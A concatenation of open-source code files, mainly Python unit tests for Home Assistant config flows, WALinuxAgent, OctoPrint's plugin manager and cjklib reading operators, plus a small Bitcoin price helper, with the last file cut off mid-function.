"""Test multiple entries are allowed when specified."""
flow = config_entries.HANDLERS['test_multiple']()
flow.hass = hass
MockConfigEntry(domain='test_multiple').add_to_hass(hass)
hass.config.api = Mock(base_url='http://example.com')
result = await flow.async_step_user()
assert result['type'] == data_entry_flow.RESULT_TYPE_FORM
async def test_webhook_config_flow_registers_webhook(hass, webhook_flow_conf):
"""Test setting up an entry creates a webhook."""
flow = config_entries.HANDLERS['test_single']()
flow.hass = hass
hass.config.api = Mock(base_url='http://example.com')
result = await flow.async_step_user(user_input={})
assert result['type'] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
assert result['data']['webhook_id'] is not None
async def test_webhook_create_cloudhook(hass, webhook_flow_conf):
    """Test that entry setup creates a cloudhook and removal deletes it."""
assert await setup.async_setup_component(hass, 'cloud', {})
async_setup_entry = Mock(return_value=mock_coro(True))
async_unload_entry = Mock(return_value=mock_coro(True))
mock_integration(hass, MockModule(
'test_single',
async_setup_entry=async_setup_entry,
async_unload_entry=async_unload_entry,
async_remove_entry=config_entry_flow.webhook_async_remove_entry,
))
mock_entity_platform(hass, 'config_flow.test_single', None)
result = await hass.config_entries.flow.async_init(
'test_single', context={'source': config_entries.SOURCE_USER})
assert result['type'] == data_entry_flow.RESULT_TYPE_FORM
coro = mock_coro({
'cloudhook_url': 'https://example.com'
})
with patch('hass_nabucasa.cloudhooks.Cloudhooks.async_create',
return_value=coro) as mock_create, \
patch('homeassistant.components.cloud.async_active_subscription',
return_value=True), \
patch('homeassistant.components.cloud.async_is_logged_in',
return_value=True):
result = await hass.config_entries.flow.async_configure(
result['flow_id'], {})
assert result['type'] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
assert result['description_placeholders']['webhook_url'] == \
'https://example.com'
assert len(mock_create.mock_calls) == 1
assert len(async_setup_entry.mock_calls) == 1
with patch('hass_nabucasa.cloudhooks.Cloudhooks.async_delete',
return_value=coro) as mock_delete:
result = \
await hass.config_entries.async_remove(result['result'].entry_id)
assert len(mock_delete.mock_calls) == 1
assert result['require_restart'] is False
| aequitas/home-assistant | tests/helpers/test_config_entry_flow.py | Python | apache-2.0 | 8,951 |
# Copyright 2014 Microsoft Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Requires Python 2.4+ and Openssl 1.0+
#
# Implements parts of RFC 2131, 1541, 1497 and
# http://msdn.microsoft.com/en-us/library/cc227282%28PROT.10%29.aspx
# http://msdn.microsoft.com/en-us/library/cc227259%28PROT.13%29.aspx
from tests.tools import *
from azurelinuxagent.distro.loader import get_distro
from azurelinuxagent.distro.default.distro import DefaultDistro
class TestDistroLoader(AgentTestCase):
@distros()
def test_distro_loader(self, *distro_args):
distro = get_distro(*distro_args)
self.assertNotEquals(None, distro)
self.assertNotEquals(DefaultDistro, type(distro))
if __name__ == '__main__':
unittest.main()
| nathanleclaire/WALinuxAgent | tests/distro/test_loader.py | Python | apache-2.0 | 1,259 |
# Lookup Bitcoin value from exchanges
from exchanges.bitfinex import Bitfinex
import re
def bitcoinValue(msg):
val = Bitfinex().get_current_price()
formattedVal = "$" + "{:,.2f}".format(val)
if re.search(r"(?i)moon", msg):
return "To the moon! " + formattedVal
else:
return "Bitcoin: " + formattedVal
| bhipple/brobot | currency.py | Python | gpl-3.0 | 336 |
import unittest
import mock
import ddt
import octoprint.plugin
import octoprint.plugin.core
##~~ Helpers for testing mixin type extraction
class A(object):
pass
class A_1(A):
pass
class A_2(A):
pass
class A_3(A):
pass
class A1_1(A_1):
pass
class B(object):
pass
class B_1(B):
pass
class C(object):
pass
class C_1(C):
pass
class D(object):
pass
@ddt.ddt
class PluginTestCase(unittest.TestCase):
def setUp(self):
import logging
logging.basicConfig(level=logging.DEBUG)
# TODO mock pkg_resources to return some defined entry_points
import os
self.plugin_folder = os.path.join(os.path.dirname(os.path.realpath(__file__)), "_plugins")
plugin_folders = [self.plugin_folder]
plugin_bases = [octoprint.plugin.OctoPrintPlugin]
plugin_entry_points = None
self.plugin_manager = octoprint.plugin.core.PluginManager(plugin_folders,
plugin_bases,
plugin_entry_points,
plugin_disabled_list=[],
logging_prefix="logging_prefix.")
self.plugin_manager.reload_plugins(startup=True, initialize_implementations=False)
self.plugin_manager.initialize_implementations()
def test_plugin_loading(self):
self.assertEqual(7, len(self.plugin_manager.enabled_plugins))
self.assertEqual(2, len(self.plugin_manager.plugin_hooks))
self.assertEqual(4, len(self.plugin_manager.plugin_implementations))
self.assertEqual(3, len(self.plugin_manager.plugin_implementations_by_type))
# hook_plugin
self.assertTrue("octoprint.core.startup" in self.plugin_manager.plugin_hooks)
self.assertEqual(1, len(self.plugin_manager.plugin_hooks["octoprint.core.startup"]))
# ordered hook plugins
self.assertTrue("some.ordered.callback" in self.plugin_manager.plugin_hooks)
self.assertEqual(3, len(self.plugin_manager.plugin_hooks["some.ordered.callback"]))
# TestStartupPlugin & TestMixedPlugin
self.assertTrue(octoprint.plugin.StartupPlugin in self.plugin_manager.plugin_implementations_by_type)
self.assertEqual(2, len(self.plugin_manager.plugin_implementations_by_type[octoprint.plugin.StartupPlugin]))
# TestSettingsPlugin & TestMixedPlugin
self.assertTrue(octoprint.plugin.SettingsPlugin in self.plugin_manager.plugin_implementations_by_type)
self.assertEqual(2, len(self.plugin_manager.plugin_implementations_by_type[octoprint.plugin.SettingsPlugin]))
# TestDeprecatedAssetPlugin, NOT TestSecondaryDeprecatedAssetPlugin
self.assertTrue(octoprint.plugin.AssetPlugin in self.plugin_manager.plugin_implementations_by_type)
self.assertEqual(1, len(self.plugin_manager.plugin_implementations_by_type[octoprint.plugin.AssetPlugin]))
def test_plugin_initializing(self):
def test_factory(name, implementation):
return dict(test_factory="test_factory_%s" % name)
def verify_injection_order(name, implementation):
self.assertTrue(hasattr(implementation, "_basefolder"))
return dict()
additional_injects = dict(
additional_inject="additional_inject"
)
additional_inject_factories = [test_factory, verify_injection_order]
self.plugin_manager.initialize_implementations(
additional_injects=additional_injects,
additional_inject_factories=additional_inject_factories
)
all_implementations = self.plugin_manager.plugin_implementations
self.assertEqual(4, len(all_implementations))
for name, impl in all_implementations.items():
self.assertTrue(name in self.plugin_manager.enabled_plugins)
plugin = self.plugin_manager.enabled_plugins[name]
# test that the standard fields were properly initialized
self.assertTrue(hasattr(impl, "_identifier"))
self.assertEqual(name, impl._identifier)
self.assertTrue(hasattr(impl, "_plugin_name"))
self.assertEqual(plugin.name, impl._plugin_name)
self.assertTrue(hasattr(impl, "_plugin_version"))
self.assertEqual(plugin.version, impl._plugin_version)
self.assertTrue(hasattr(impl, "_logger"))
self.assertIsNotNone(impl._logger)
self.assertEqual("logging_prefix.%s" % name, impl._logger.name)
self.assertTrue(hasattr(impl, "_basefolder"))
self.assertTrue(impl._basefolder.startswith(self.plugin_folder))
# test that the additional injects were properly injected
self.assertTrue(hasattr(impl, "_additional_inject"))
self.assertEqual("additional_inject", impl._additional_inject)
# test that the injection factory was properly executed and the result injected
self.assertTrue(hasattr(impl, "_test_factory"))
self.assertEqual("test_factory_%s" % name, impl._test_factory)
def test_get_plugin(self):
plugin = self.plugin_manager.get_plugin("hook_plugin")
self.assertIsNotNone(plugin)
self.assertEqual("Hook Plugin", plugin.__plugin_name__)
plugin = self.plugin_manager.get_plugin("mixed_plugin")
self.assertIsNotNone(plugin)
self.assertEqual("Mixed Plugin", plugin.__plugin_name__)
plugin = self.plugin_manager.get_plugin("unknown_plugin")
self.assertIsNone(plugin)
def test_get_plugin_info(self):
plugin_info = self.plugin_manager.get_plugin_info("hook_plugin")
self.assertIsNotNone(plugin_info)
self.assertEqual("Hook Plugin", plugin_info.name)
plugin_info = self.plugin_manager.get_plugin_info("unknown_plugin")
self.assertIsNone(plugin_info)
def test_get_hooks(self):
hooks = self.plugin_manager.get_hooks("octoprint.core.startup")
self.assertEqual(1, len(hooks))
self.assertTrue("hook_plugin" in hooks)
self.assertEqual("success", hooks["hook_plugin"]())
hooks = self.plugin_manager.get_hooks("octoprint.printing.print")
self.assertEqual(0, len(hooks))
def test_sorted_hooks(self):
hooks = self.plugin_manager.get_hooks("some.ordered.callback")
self.assertEqual(3, len(hooks))
self.assertListEqual(["one_ordered_hook_plugin", "another_ordered_hook_plugin", "hook_plugin"], hooks.keys())
def test_get_implementations(self):
implementations = self.plugin_manager.get_implementations(octoprint.plugin.StartupPlugin)
self.assertListEqual(["mixed_plugin", "startup_plugin"], map(lambda x: x._identifier, implementations))
implementations = self.plugin_manager.get_implementations(octoprint.plugin.SettingsPlugin)
self.assertListEqual(["mixed_plugin", "settings_plugin"], map(lambda x: x._identifier, implementations))
implementations = self.plugin_manager.get_implementations(octoprint.plugin.StartupPlugin, octoprint.plugin.SettingsPlugin)
self.assertListEqual(["mixed_plugin"], map(lambda x: x._identifier, implementations))
implementations = self.plugin_manager.get_implementations(octoprint.plugin.AssetPlugin)
self.assertListEqual(["deprecated_plugin"], map(lambda x: x._identifier, implementations))
def test_get_filtered_implementations(self):
implementations = self.plugin_manager.get_filtered_implementations(lambda x: x._identifier.startswith("startup"), octoprint.plugin.StartupPlugin)
self.assertEqual(1, len(implementations))
def test_get_sorted_implementations(self):
implementations = self.plugin_manager.get_implementations(octoprint.plugin.StartupPlugin, sorting_context="sorting_test")
self.assertListEqual(["startup_plugin", "mixed_plugin"], map(lambda x: x._identifier, implementations))
def test_client_registration(self):
def test_client(*args, **kwargs):
pass
self.assertEqual(0, len(self.plugin_manager.registered_clients))
self.plugin_manager.register_message_receiver(test_client)
self.assertEqual(1, len(self.plugin_manager.registered_clients))
self.assertIn(test_client, self.plugin_manager.registered_clients)
self.plugin_manager.unregister_message_receiver(test_client)
self.assertEqual(0, len(self.plugin_manager.registered_clients))
self.assertNotIn(test_client, self.plugin_manager.registered_clients)
def test_send_plugin_message(self):
client1 = mock.Mock()
client2 = mock.Mock()
self.plugin_manager.register_message_receiver(client1.on_plugin_message)
self.plugin_manager.register_message_receiver(client2.on_plugin_message)
plugin = "some plugin"
data = "some data"
self.plugin_manager.send_plugin_message(plugin, data)
client1.on_plugin_message.assert_called_once_with(plugin, data)
client2.on_plugin_message.assert_called_once_with(plugin, data)
def test_validate_plugin(self):
self.assertTrue("deprecated_plugin" in self.plugin_manager.enabled_plugins)
plugin = self.plugin_manager.enabled_plugins["deprecated_plugin"]
self.assertTrue(hasattr(plugin.instance, plugin.__class__.attr_implementation))
self.assertFalse(hasattr(plugin.instance, plugin.__class__.attr_implementations))
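	# The following tests are parametrized via ddt: @ddt.data supplies one
	# argument tuple per generated test and @ddt.unpack spreads each tuple over
	# the test method's parameters.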
@ddt.data(
(["octoprint.some_hook"], ["octoprint.some_hook", "octoprint.another_hook"], True),
(["octoprint.*"], ["octoprint.some_hook", "octoprint.another_hook"], True),
(["octoprint.some_hook"], ["octoprint.another_hook"], False),
(["octoprint.some_hook"], [], False),
([], ["octoprint.some_hook"], False)
)
@ddt.unpack
def test_has_any_of_hooks(self, hooks_to_test_for, plugin_hooks, expected):
plugin = mock.MagicMock()
plugin.hooks = dict((hook, hook) for hook in plugin_hooks)
actual = octoprint.plugin.core.PluginManager.has_any_of_hooks(plugin, hooks_to_test_for)
self.assertEqual(actual, expected)
def test_has_any_of_hooks_varargs(self):
plugin = mock.MagicMock()
plugin.hooks = dict((hook, hook) for hook in ["octoprint.some_hook", "octoprint.another_hook"])
result = octoprint.plugin.core.PluginManager.has_any_of_hooks(plugin, "octoprint.some_hook", "octoprint.some_other_hook")
self.assertTrue(result)
def test_has_any_of_hooks_nohooks(self):
plugin = mock.MagicMock()
result = octoprint.plugin.core.PluginManager.has_any_of_hooks(plugin, "octoprint.some_hook", "octoprint.some_other_hook")
self.assertFalse(result)
@ddt.data(
("octoprint.some_hook", ["octoprint.another_hook", "octoprint.some_hook"], True),
("octoprint.some_hook", ["octoprint.*"], True),
("octoprint.some_hook", ["octoprint.some_hook*"], True),
("octoprint.some_hook", ["octoprint.*_hook"], True),
("octoprint.some_hook", ["octoprint.another_hook.*"], False),
("", ["octoprint.some_hook"], False),
(None, ["octoprint.some_hook"], False),
("octoprint.some_hook", [], False),
("octoprint.some_hook", None, False),
("octoprint.some_hook", [None], False)
)
@ddt.unpack
def test_hook_matches_hooks(self, hook, hooks, expected):
actual = octoprint.plugin.core.PluginManager.hook_matches_hooks(hook, hooks)
self.assertEqual(actual, expected)
def test_hook_matches_hooks_varargs(self):
result = octoprint.plugin.core.PluginManager.hook_matches_hooks("octoprint.some_hook",
"octoprint.another_hook", "octoprint.some_hook")
self.assertTrue(result)
@ddt.data(
([octoprint.plugin.RestartNeedingPlugin], [octoprint.plugin.Plugin, octoprint.plugin.RestartNeedingPlugin], True),
([octoprint.plugin.RestartNeedingPlugin], [octoprint.plugin.Plugin], False),
([], [octoprint.plugin.Plugin], False),
([octoprint.plugin.RestartNeedingPlugin], [], False)
)
@ddt.unpack
def test_has_any_of_mixins(self, mixins_to_test_for, plugin_mixins, expected):
plugin = mock.MagicMock()
plugin.implementation = mock.MagicMock()
for mixin in plugin_mixins:
plugin.implementation.mock_add_spec(mixin)
actual = octoprint.plugin.core.PluginManager.has_any_of_mixins(plugin, mixins_to_test_for)
self.assertEqual(actual, expected)
def test_has_any_of_mixins_varargs(self):
plugin = mock.MagicMock()
plugin.implementation = mock.MagicMock()
plugin.implementation.mock_add_spec(octoprint.plugin.Plugin)
plugin.implementation.mock_add_spec(octoprint.plugin.RestartNeedingPlugin)
result = octoprint.plugin.core.PluginManager.has_any_of_mixins(plugin, octoprint.plugin.RestartNeedingPlugin)
self.assertTrue(result)
def test_has_any_of_mixins_noimplementation(self):
plugin = mock.MagicMock()
result = octoprint.plugin.core.PluginManager.has_any_of_mixins(plugin, octoprint.plugin.RestartNeedingPlugin)
self.assertFalse(result)
@ddt.data(
((A1_1, A_2, B_1, C_1), (A, C), (A_1, A1_1, A_2, C_1)),
((A1_1, A_2, B_1, C_1), (B,), (B_1,)),
# not a subclass
((A1_1, A_2, B_1, C_1), (D,), ()),
# subclass only of base
((A,), (A,), ())
)
@ddt.unpack
def test_mixins_matching_bases(self, bases_to_set, bases_to_check, expected):
Foo = type("Foo", bases_to_set, dict())
actual = octoprint.plugin.core.PluginManager.mixins_matching_bases(Foo, *bases_to_check)
self.assertSetEqual(actual, set(expected))
| Jaesin/OctoPrint | tests/plugin/test_core.py | Python | agpl-3.0 | 12,641 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
# This file is part of cjklib.
#
# cjklib is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# cjklib is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with cjklib. If not, see <http://www.gnu.org/licenses/>.
"""
Unit tests for :mod:`cjklib.reading.operator`.
"""
# pylint: disable-msg=E1101
# testcase attributes and methods are only available in concrete classes
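# The test cases below are normally collected by cjklib's test suite; a minimal
# stand-alone invocation (a sketch, assuming a configured cjklib database and a
# unittest version supporting module discovery) would be:
#
#   python -m unittest cjklib.test.readingoperator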
import re
import types
import unittest
import unicodedata
from cjklib.reading import ReadingFactory
from cjklib import exception
from cjklib.test import NeedsDatabaseTest, attr
from cjklib.util import crossDict
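# crossDict is used below to combine several lists of option dicts into their
# cross product, i.e. one merged dict per possible combination of dialect options.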
class ReadingOperatorTest(NeedsDatabaseTest):
"""
Base class for testing of
:class:`~cjklib.reading.operator.ReadingOperator` classes.
"""
READING_NAME = None
"""Name of reading to test"""
def setUp(self):
NeedsDatabaseTest.setUp(self)
self.f = ReadingFactory(dbConnectInst=self.db)
for clss in self.f.getReadingOperatorClasses():
if clss.READING_NAME == self.READING_NAME:
self.readingOperatorClass = clss
break
else:
self.readingOperatorClass = None
    def shortDescription(self):
        method = getattr(self, self.id().split('.')[-1])
        # get the whole docstring and remove superfluous whitespace
        noWhitespaceDoc = re.sub(r'\s+', ' ', method.__doc__.strip())
        # remove markup for epytext format
        clearName = re.sub(r'[CLI]\{([^\}]*)\}', r'\1', noWhitespaceDoc)
        # add name of reading
        return clearName + ' (for %s)' % self.READING_NAME
def tearDown(self):
# get rid of the possibly > 1000 instances
self.f.clearCache()
class ReadingOperatorConsistencyTest(ReadingOperatorTest):
"""
Base class for consistency testing of
:class:`~cjklib.reading.operator.ReadingOperator` classes.
"""
DIALECTS = []
"""
Dialects tested additionally to the standard one.
Given as list of dictionaries holding the dialect's options.
"""
def testReadingNameUnique(self):
"""Test if only one ReadingOperator exists for each reading."""
seen = False
for clss in self.f.getReadingOperatorClasses():
if clss.READING_NAME == self.READING_NAME:
self.assert_(not seen,
"Reading %s has more than one operator" \
% clss.READING_NAME)
seen = True
def testInstantiation(self):
"""Test if given dialects can be instantiated."""
        self.assert_(self.readingOperatorClass is not None,
"No reading operator class found" \
+ ' (reading %s)' % self.READING_NAME)
forms = []
forms.extend(self.DIALECTS)
if {} not in forms:
forms.append({})
for dialect in forms:
# instantiate
self.readingOperatorClass(**dialect)
def testDefaultOptions(self):
"""
Test if option dict returned by ``getDefaultOptions()`` is well-formed
and includes all options found in the test case's options.
"""
defaultOptions = self.readingOperatorClass.getDefaultOptions()
self.assertEquals(type(defaultOptions), type({}),
"Default options %s is not of type dict" % repr(defaultOptions) \
+ ' (reading %s)' % self.READING_NAME)
# test if option names are well-formed
for option in defaultOptions:
self.assertEquals(type(option), type(''),
"Option %s is not of type str" % repr(option) \
+ ' (reading %s)' % self.READING_NAME)
# test all given dialects
forms = []
forms.extend(self.DIALECTS)
if {} not in forms:
forms.append({})
for dialect in forms:
for option in dialect:
self.assert_(option in defaultOptions,
"Test case option %s not found in default options" \
% repr(option) \
+ ' (reading %s, dialect %s)' \
% (self.READING_NAME, dialect))
# test instantiation of default options
defaultInstance = self.readingOperatorClass(**defaultOptions)
# check if option value changes after instantiation
for option in defaultOptions:
self.assertEqual(getattr(defaultInstance, option),
defaultOptions[option],
"Default option value %s for %s changed on instantiation: %s" \
% (repr(defaultOptions[option]), repr(option),
repr(getattr(defaultInstance, option))) \
+ ' (reading %s)' % self.READING_NAME)
# check options against instance without explicit option dict
instance = self.readingOperatorClass()
for option in defaultOptions:
self.assertEqual(getattr(instance, option),
getattr(defaultInstance, option),
"Option value for %s unequal for default instances: %s and %s" \
% (repr(option), repr(getattr(instance, option)),
repr(getattr(defaultInstance, option))) \
+ ' (reading %s)' % self.READING_NAME)
def testGuessReadingDialect(self):
"""
Test if option dict returned by ``guessReadingDialect()`` is well-formed
and options are included in dict from ``getDefaultOptions()``.
"""
if not hasattr(self.readingOperatorClass, 'guessReadingDialect'):
return
defaultOptions = self.readingOperatorClass.getDefaultOptions()
readingDialect = self.readingOperatorClass.guessReadingDialect('')
        self.assertEquals(type(readingDialect), type({}),
"Guessed options %s is not of type dict" % repr(readingDialect) \
+ ' (reading %s)' % self.READING_NAME)
# test if option names are well-formed
for option in readingDialect:
self.assertEquals(type(option), type(''),
"Option %s is not of type str" % repr(option) \
+ ' (reading %s)' % self.READING_NAME)
# test inclusion in default set
for option in readingDialect:
self.assert_(option in defaultOptions,
"Option %s not found in default options" % repr(option) \
+ ' (reading %s)' % self.READING_NAME)
# test instantiation of default options
self.readingOperatorClass(**readingDialect)
@attr('quiteslow')
def testReadingCharacters(self):
"""
Test if set returned by ``getReadingCharacters()`` is well-formed and
includes all characters found in reading entities.
"""
if not hasattr(self.readingOperatorClass, "getReadingCharacters"):
return
# test all given dialects
forms = []
forms.extend(self.DIALECTS)
if {} not in forms:
forms.append({})
for dialect in forms:
readingOperator = self.f.createReadingOperator(self.READING_NAME,
**dialect)
readingCharacters = readingOperator.getReadingCharacters()
# make sure all are characters
for char in readingCharacters:
self.assert_(len(char) == 1,
"Not len()==1: %s" % repr(char) \
+ ' (reading %s, dialect %s)' \
% (self.READING_NAME, dialect))
entities = readingOperator.getReadingEntities()
for entity in entities:
charList = set(entity)
# include NFD form
charList.update(unicodedata.normalize('NFD', unicode(entity)))
for char in charList:
self.assert_(char in readingCharacters,
"Char %s not included" % repr(char) \
+ ' (reading %s, dialect %s)' \
% (self.READING_NAME, dialect))
def testValidReadingEntitiesAccepted(self):
"""
Test if all *reading entities* returned by ``getReadingEntities()`` are
accepted by ``isReadingEntity()``.
"""
if not hasattr(self.readingOperatorClass, "getReadingEntities"):
return
forms = []
forms.extend(self.DIALECTS)
if {} not in forms:
forms.append({})
for dialect in forms:
entities = self.f.getReadingEntities(self.READING_NAME,
**dialect)
for entity in entities:
self.assert_(
self.f.isReadingEntity(entity, self.READING_NAME,
**dialect),
"Entity %s not accepted" % repr(entity) \
+ ' (reading %s, dialect %s)' \
% (self.READING_NAME, dialect))
def testValidFormattingEntitiesAccepted(self):
"""
Test if all *formatting entities* returned by
``getFormattingEntities()`` are accepted by ``isFormattingEntity()``.
"""
if not hasattr(self.readingOperatorClass, "getFormattingEntities"):
return
forms = []
forms.extend(self.DIALECTS)
if {} not in forms:
forms.append({})
for dialect in forms:
entities = self.f.getFormattingEntities(self.READING_NAME,
**dialect)
for entity in entities:
self.assert_(
self.f.isFormattingEntity(entity, self.READING_NAME,
**dialect),
"Entity %s not accepted" % repr(entity) \
+ ' (reading %s, dialect %s)' \
% (self.READING_NAME, dialect))
def testValidPlainReadingEntitiesAccepted(self):
"""
Test if all plain reading entities returned by
``getPlainReadingEntities()`` are accepted by ``isPlainReadingEntity()``.
"""
if not hasattr(self.readingOperatorClass, "getPlainReadingEntities"):
return
forms = []
forms.extend(self.DIALECTS)
if {} not in forms:
forms.append({})
for dialect in forms:
plainEntities = self.f.getPlainReadingEntities(self.READING_NAME,
**dialect)
for plainEntity in plainEntities:
self.assert_(
self.f.isPlainReadingEntity(plainEntity, self.READING_NAME,
**dialect),
"Plain entity %s not accepted" % repr(plainEntity) \
+ ' (reading %s, dialect %s)' \
% (self.READING_NAME, dialect))
@attr('quiteslow')
def testOnsetRhyme(self):
"""Test if all plain entities are accepted by ``getOnsetRhyme()``."""
if not hasattr(self.readingOperatorClass, "getPlainReadingEntities") \
or not hasattr(self.readingOperatorClass, "getOnsetRhyme"):
return
forms = []
forms.extend(self.DIALECTS)
if {} not in forms:
forms.append({})
for dialect in forms:
readingOperator = self.f.createReadingOperator(self.READING_NAME,
**dialect)
plainEntities = readingOperator.getPlainReadingEntities()
for plainEntity in plainEntities:
try:
readingOperator.getOnsetRhyme(plainEntity)
except exception.InvalidEntityError:
self.fail("Plain entity %s not accepted" \
% repr(plainEntity) \
+ ' (reading %s, dialect %s)' \
% (self.READING_NAME, dialect))
except exception.UnsupportedError:
pass
@attr('quiteslow')
def testDecomposeIsIdentityForSingleEntity(self):
"""
Test if all reading entities returned by ``getReadingEntities()`` are
decomposed into the single entity again.
"""
if not hasattr(self.readingOperatorClass, "getReadingEntities"):
return
forms = []
forms.extend(self.DIALECTS)
if {} not in forms:
forms.append({})
for dialect in forms:
entities = self.f.getReadingEntities(self.READING_NAME, **dialect)
for entity in entities:
try:
entities = self.f.decompose(entity, self.READING_NAME,
**dialect)
self.assertEquals(entities, [entity],
"decomposition on single entity %s" % repr(entity) \
+ " is not identical: %s" % repr(entities) \
+ ' (reading %s, dialect %s)' \
% (self.READING_NAME, dialect))
except exception.AmbiguousDecompositionError:
self.fail("ambiguous decomposition for %s" % repr(entity) \
+ ' (reading %s, dialect %s)' \
% (self.READING_NAME, dialect))
except exception.DecompositionError:
self.fail("decomposition error for %s" % repr(entity) \
+ ' (reading %s, dialect %s)' \
% (self.READING_NAME, dialect))
@attr('quiteslow')
def testGetTonalEntityOfSplitEntityToneIsIdentity(self):
"""
Test if the composition of ``getTonalEntity()`` and ``splitEntityTone()``
returns the original value for all entities returned by
``getReadingEntities()``.
"""
if not (hasattr(self.readingOperatorClass, "getTonalEntity")
and hasattr(self.readingOperatorClass, "splitEntityTone")
and hasattr(self.readingOperatorClass, "getReadingEntities")):
return
forms = []
forms.extend(self.DIALECTS)
if {} not in forms:
forms.append({})
for dialect in forms:
entities = self.f.getReadingEntities(self.READING_NAME, **dialect)
for entity in entities:
try:
plainEntity, tone = self.f.splitEntityTone(entity,
self.READING_NAME, **dialect)
self.assertEquals(
self.f.getTonalEntity(plainEntity, tone,
self.READING_NAME, **dialect),
entity,
"Entity %s not preserved in composition" % repr(entity)\
+ " of getTonalEntity() and splitEntityTone()" \
+ ' (reading %s, dialect %s)' \
% (self.READING_NAME, dialect))
except exception.UnsupportedError:
pass
except exception.InvalidEntityError:
self.fail("Entity %s raised InvalidEntityError" \
% repr(entity) \
+ ' (reading %s, dialect %s)' \
% (self.READING_NAME, dialect))
if (not hasattr(self, 'testUpperCase')
or self.testUpperCase(dialect)):
for entity in entities:
entityUpper = entity.upper()
if entity == entityUpper:
continue
try:
plainEntity, tone = self.f.splitEntityTone(
entityUpper, self.READING_NAME, **dialect)
self.assertEquals(
self.f.getTonalEntity(plainEntity, tone,
self.READING_NAME, **dialect),
entity.upper(),
("Entity %s not preserved in composition"
% repr(entityUpper)) \
+ " of getTonalEntity() and splitEntityTone()" \
+ ' (reading %s, dialect %s)' \
% (self.READING_NAME, dialect))
except exception.UnsupportedError:
pass
except exception.InvalidEntityError:
self.fail("Entity %s raised InvalidEntityError" \
% repr(entityUpper) \
+ ' (reading %s, dialect %s)' \
% (self.READING_NAME, dialect))
@attr('quiteslow')
def testSplitEntityToneReturnsValidInformation(self):
"""
Test if ``splitEntityTone()`` returns a valid plain entity and a valid
tone for all entities returned by ``getReadingEntities()``.
"""
if not hasattr(self.readingOperatorClass, "getPlainReadingEntities"):
return
forms = []
forms.extend(self.DIALECTS)
if {} not in forms:
forms.append({})
for dialect in forms:
entities = self.f.getReadingEntities(self.READING_NAME, **dialect)
for entity in entities:
try:
plainEntity, tone = self.f.splitEntityTone(entity,
self.READING_NAME, **dialect)
self.assert_(self.f.isPlainReadingEntity(plainEntity,
self.READING_NAME, **dialect),
"Plain entity of %s not accepted: %s" \
% (repr(entity), repr(plainEntity)) \
+ ' (reading %s, dialect %s)' \
% (self.READING_NAME, dialect))
self.assert_(
tone in self.f.getTones(self.READING_NAME, **dialect),
"Tone of entity %s not valid: %s " \
% (repr(entity), repr(tone)) \
+ ' (reading %s, dialect %s)' \
% (self.READING_NAME, dialect))
except exception.UnsupportedError:
pass
except exception.InvalidEntityError:
self.fail("Entity %s raised InvalidEntityError" \
% repr(entity) \
+ ' (reading %s, dialect %s)' \
% (self.READING_NAME, dialect))
    # TODO Jyutping (missing tone marks) and CantoneseYale don't create strict
    # compositions
@attr('slow')
def testDecomposeKeepsSyllablePairs(self):
"""
Test if all pairs of reading entities returned by
``getReadingEntities()`` are decomposed into the same pairs again and
possibly are strict.
"""
if not hasattr(self.readingOperatorClass, "getReadingEntities"):
return
forms = []
forms.extend(self.DIALECTS)
if {} not in forms:
forms.append({})
for dialect in forms:
entities = self.f.getReadingEntities(self.READING_NAME, **dialect)
for entityA in entities:
for entityB in entities:
pair = [entityA, entityB]
string = self.f.compose(pair, self.READING_NAME, **dialect)
try:
decomposition = self.f.decompose(string,
self.READING_NAME, **dialect)
if hasattr(self, 'cleanDecomposition'):
cleanDecomposition = self.cleanDecomposition(
decomposition, self.READING_NAME, **dialect)
else:
cleanDecomposition = decomposition
self.assertEquals(cleanDecomposition, pair,
"decompose doesn't keep entity pair %s: %s" \
% (repr(pair), repr(cleanDecomposition)) \
+ ' (reading %s, dialect %s)' \
% (self.READING_NAME, dialect))
# test if method exists and by default is not False
if hasattr(self.readingOperatorClass,
"isStrictDecomposition") \
and self.f.isStrictDecomposition([],
self.READING_NAME, **dialect) != False: # TODO this doesn't capture bugs in isStrictDecomposition that return False for an empty array
strict = self.f.isStrictDecomposition(decomposition,
self.READING_NAME, **dialect)
self.assert_(strict,
"Decomposition for pair %s is not strict" \
% repr(string) \
+ ' (reading %s, dialect %s)' \
% (self.READING_NAME, dialect))
except exception.AmbiguousDecompositionError:
self.fail('Decomposition ambiguous for pair %s' \
% repr(pair) \
+ ' (reading %s, dialect %s)' \
% (self.READING_NAME, dialect))
except exception.DecompositionError:
self.fail('Decomposition fails for pair %s' \
% repr(pair) \
+ ' (reading %s, dialect %s)' \
% (self.READING_NAME, dialect))
class ReadingOperatorTestCaseCheck(NeedsDatabaseTest, unittest.TestCase):
"""
Checks if every
:class:`~cjklib.reading.operator.ReadingOperator` has its own
:class:`~cjklib.test.readingoperator.ReadingOperatorConsistencyTest`.
"""
def testEveryOperatorHasConsistencyTest(self):
"""
Check if every reading has a test case.
"""
testClasses = self.getReadingOperatorConsistencyTestClasses()
testClassReadingNames = [clss.READING_NAME for clss in testClasses]
self.f = ReadingFactory(dbConnectInst=self.db)
for clss in self.f.getReadingOperatorClasses():
self.assert_(clss.READING_NAME in testClassReadingNames,
"Reading %s has no ReadingOperatorConsistencyTest" \
% clss.READING_NAME)
@staticmethod
def getReadingOperatorConsistencyTestClasses():
"""
Gets all classes implementing
:class:`cjklib.test.readingoperator.ReadingOperatorConsistencyTest`.
:rtype: list
:return: list of all classes inheriting form
:class:`cjklib.test.readingoperator.ReadingOperatorConsistencyTest`
"""
# get all non-abstract classes that inherit from
# ReadingOperatorConsistencyTest
testModule = __import__("cjklib.test.readingoperator")
testClasses = [clss for clss \
in testModule.test.readingoperator.__dict__.values() \
